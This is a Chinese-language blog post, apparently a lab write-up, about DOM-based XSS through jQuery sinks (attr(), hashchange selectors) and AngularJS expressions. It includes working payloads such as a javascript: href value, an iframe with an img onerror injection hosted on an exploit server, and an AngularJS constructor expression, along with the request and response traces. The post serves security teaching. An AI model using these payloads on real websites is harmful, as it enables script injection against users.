\u73fe\u4ee3 Web \u61c9\u7528\u7a0b\u5f0f\u901a\u5e38\u662f\u4f7f\u7528\u8a31\u591a\u7b2c\u4e09\u65b9\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u5efa\u7acb\u7684\uff0c\u9019\u4e9b\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u901a\u5e38\u70ba\u958b\u767c\u4eba\u54e1\u63d0\u4f9b\u9644\u52a0\u529f\u80fd\u548c\u80fd\u529b\uff0c\u6240\u4ee5\u4e5f\u662f DOM XSS \u7684\u6f5b\u5728source\u548csink\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
jquery\u5e38\u898b\u7684\u9ad8\u98a8\u96aasink<\/p>\n\n\n\n
add()\r\nafter()\r\nappend()\r\nanimate()\r\ninsertAfter()\r\ninsertBefore()\r\nbefore()\r\nhtml()\r\nprepend()\r\nreplaceAll()\r\nreplaceWith()\r\nwrap()\r\nwrapInner()\r\nwrapAll()\r\nhas()\r\nconstructor()\r\ninit()\r\nindex()\r\njQuery.parseHTML()\r\n$.parseHTML()<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
jQuery sink + window.location.search<\/h2>\n\n\n\n
jQuery \u7684attr()\u51fd\u6578\u53ef\u4ee5\u6539\u8b8a DOM \u5143\u7d20\u7684\u5c6c\u6027\u3002 \u5982\u679c\u5f9e\u4f7f\u7528\u8005\u63a7\u5236\u7684source\u8b80\u53d6\u6578\u64da\uff0c\u7136\u5f8c\u5c07\u5176\u50b3\u905e\u7d66\u51fd\u6578attr()\uff0c\u5247\u53ef\u80fd\u6703\u64cd\u7e31\u767c\u9001\u7684\u503c\u4ee5\u5c0e\u81f4 XSS<\/p>\n\n\n\n
\u8acb\u6c42feedback?returnPath=javascript:alert(1)<\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u5982\u4e0b\uff0c<\/p>\n\n\n\n<div class=\"is-linkback\">\n <a id=\"backLink\" href=\"\">Back<\/a>\n<\/div>\n<script>\n$(function() {\n $('#backLink').attr<\/mark>(\"href\", (new URLSearchParams(window.location.search<\/mark>)).get('returnPath'));\n});\n<\/script><\/code><\/pre>\n\n\n\n\u7528chrome\u7684inspect\u770b\u6e32\u67d3\u7d50\u679c\u5982\u4e0b\uff0c\u53ef\u6210\u529f\u89f8\u767cxss\u653b\u64ca<\/p>\n\n\n\n
<div class=\"is-linkback\">\n <a id=\"backLink\" href=\"javascript:alert(1)<\/mark>\">Back<\/a>\n<\/div>\n<script>\n$(function() {\n $('#backLink').attr(\"href\", (new URLSearchParams(window.location.search)).get('returnPath'));\n});\n<\/script><\/code><\/pre>\n\n\n\nLab: DOM XSS in jQuery anchor href attribute sink using location.search source<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
jQuery sink + location.hash<\/h2>\n\n\n\n
hash<\/code>\u662f\u7528\u6236\u53ef\u63a7\u7684\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u5229\u7528\u5b83\u6ce8\u5165 XSS\u00a0\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n\u5148\u6e96\u5099\u653b\u64ca\u9801\u9762exploit-server.net\/exploit\uff0c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n
<iframe src=\"https:\/\/0aff00b9047f752b80a5b37500a40022.web-security-academy.net\/#\" onload=\"this.src+='<img src=x onerror=print()>'\"><\/iframe><\/code><\/pre>\n\n\n\n\u7576\u53d7\u5bb3\u8005\u8a2a\u554fexploit-server.net\/exploit\uff0c\u6703\u89f8\u767cxss\u653b\u64ca\uff0c\u904b\u4f5c\u6d41\u7a0b\u5982\u4e0b <\/p>\n\n\n\n
############ request ###################\nGET \/exploit HTTP\/2\r\nHost: exploit-server.net\n...omit...\n\n############ response ###################\n...omit...\n<iframe src=\"https:\/\/0aff00b9047f752b80a5b37500a40022.web-security-academy.net\/#\" onload=\"this.src+='<img src=xxx onerror=print()>'\"><\/iframe>\n...omit...<\/code><\/pre>\n\n\n\n\u7531\u65bc\u8fd4\u56de\u5167\u5bb9\u6709iframe src=\"https:\/\/0aff00b9047f752b80a5b37500a40022.web-security-academy.net<\/code>\uff0c\u6240\u4ee5\u7522\u751f2\u500b\u8b80\u53d6\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n########### request ############\nGET \/ HTTP\/2\nHost: 0aff00b9047f752b80a5b37500a40022.web-security-academy.net\n...omit...\n\n########### response ############\n...omit...\n<script>\r\n$(window).on('hashchange<\/mark>', function(){\r\n var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)<\/mark>) + ')');\r\n if (post) post.get(0).scrollIntoView();\r\n});\r\n<\/script>\n...omit...<\/code><\/pre>\n\n\n\n\u5f9e\u8fd4\u56de\u7684Js\u4e2d\u80fd\u767c\u73fe\uff0chashchange\u6703\u76e3\u807durl\u4e2d#\u5f8c\u9762\u7684\u503c\uff0cwindow.location.hash.slice(1)\u6703\u7372\u53d6\u4e0d\u542b#\u7684hash\u5b57\u7b26\u4e32\uff0c\u4e26\u7528decodeURIComponent\u9032\u884c\u89e3\u78bc\u5f97\u5230onload=\"this.src+='<img src=xxx onerror=print()>'\"<\/code>\uff0c\u7531\u65bcimg src=xxx<\/code>\u56e0\u6b64\u7522\u751f\u4e00\u500b\u8acb\u6c42\u5982\u4e0b\uff0c\u4e26\u89f8\u767cxss<\/p>\n\n\n\n########### request ############\nGET \/xxx HTTP\/2\r\nHost: 0aff00b9047f752b80a5b37500a40022.web-security-academy.net\n...omit...\n\n########### response ############\n...omit...\n\"Not Found\"<\/code><\/pre>\n\n\n\n\u4e0d\u904e\u6700\u65b0\u7248\u672c\u7684 jQuery \u5df2\u4fee\u5fa9\u6b64\u7279\u5b9a\u6f0f\u6d1e\uff0c\u963b\u6b62\u60a8\u5728\u8f38\u5165\u4ee5hash\u5b57\u5143#<\/code> \u958b\u982d\u6642\u5c07 HTML \u6ce8\u5165<\/p>\n\n\n\nLab: DOM XSS in jQuery selector sink using a hashchange event<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
AngularJS <\/h2>\n\n\n\n
\u5982\u679c\u4f7f\u7528\u50cf AngularJS \u9019\u6a23\u7684\u6846\u67b6\uff0c\u5247\u53ef\u4ee5\u5728\u6c92\u6709<><\/code>\u6216\u4e8b\u4ef6\u7684\u60c5\u6cc1\u4e0b\u57f7\u884c JavaScript\u3002AngularJS\u7684ng-app\u6703\u6383\u63cf\u5305\u542b\u5c6c\u6027\uff08\u4e5f\u7a31\u70ba AngularJS \u6307\u4ee4\uff09\u7684HTML\u7bc0\u9ede\u7684\u5167\u5bb9\uff0c\u7576\u6307\u4ee4\u52a0\u5165HTML\u7a0b\u5f0f\u78bc\u6642\uff0c\u60a8\u53ef\u4ee5\u57f7\u884c{{ }}<\/code>\u5167\u7684 JavaScript \u904b\u7b97\u5f0f<\/p>\n\n\n\n\u4f8b\u5982\uff0c\u5728\u641c\u5c0b\u6846\u8f38\u5165{{$on.constructor('alert(1)')()}}<\/code>\u4ee5\u57f7\u884c AngularJS \u8868\u9054\u5f0f\uff0c\u5c31\u6703\u5f48\u51faalert\u4fe1\u606f<\/p>\n\n\n\n############# request #################\nGET \/?search=%7B%7B%24on.constructor%28%27alert%281%29%27%29%28%29%7D%7D HTTP\/2\n...omit...\n\n############# response #################\n...omit...\n<body ng-app>\n...omit...\n <h1>0 search results for '{{$on.constructor('alert(1)')()}}'<\/h1>\n...omit...<\/code><\/pre>\n\n\n\nLab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u73fe\u4ee3 Web \u61c9\u7528\u7a0b\u5f0f\u901a\u5e38\u662f\u4f7f\u7528\u8a31\u591a\u7b2c\u4e09\u65b9\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u5efa\u7acb\u7684 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[41],"class_list":["post-1250","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-xss"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1250"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1250\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}